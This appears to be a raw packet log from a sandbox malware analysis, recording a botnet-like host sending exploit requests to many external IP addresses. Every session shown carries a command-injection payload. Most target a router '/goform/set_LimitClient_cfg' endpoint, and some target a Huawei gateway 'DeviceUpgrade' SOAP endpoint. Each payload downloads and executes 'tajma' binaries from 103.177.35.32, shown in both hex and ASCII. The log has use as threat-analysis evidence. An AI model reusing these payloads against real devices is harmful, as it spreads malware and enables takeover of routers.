                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1246192.168.2.233382657.214.108.1078080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.374088049 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1247192.168.2.234070460.118.57.68080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.374120951 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1248192.168.2.233944297.221.126.748080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.374139071 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1249192.168.2.2359222109.78.115.1018080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.374157906 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1250192.168.2.2360146159.80.72.1208080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.374809027 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1251192.168.2.2346696209.101.121.68080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.434241056 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1252192.168.2.2359602186.63.20.868080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.434273958 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1253192.168.2.234693659.201.125.1848080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.434305906 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1254192.168.2.235699497.92.124.1328080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.434324980 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1255192.168.2.2337084205.154.15.678080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.434353113 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1256192.168.2.235907651.200.188.1758080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.434379101 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1257192.168.2.2354932139.110.90.1368080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.434439898 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1258192.168.2.2345374197.189.61.14037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.531250954 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1259192.168.2.234751686.69.187.16237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.531250954 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1260192.168.2.2334584157.0.68.21837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.531253099 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1261192.168.2.2352244154.25.172.408080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.368469000 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1262192.168.2.234815477.144.241.2158080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.368545055 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1263192.168.2.233381891.149.129.1248080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.368568897 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1264192.168.2.23414128.220.243.858080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.368591070 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
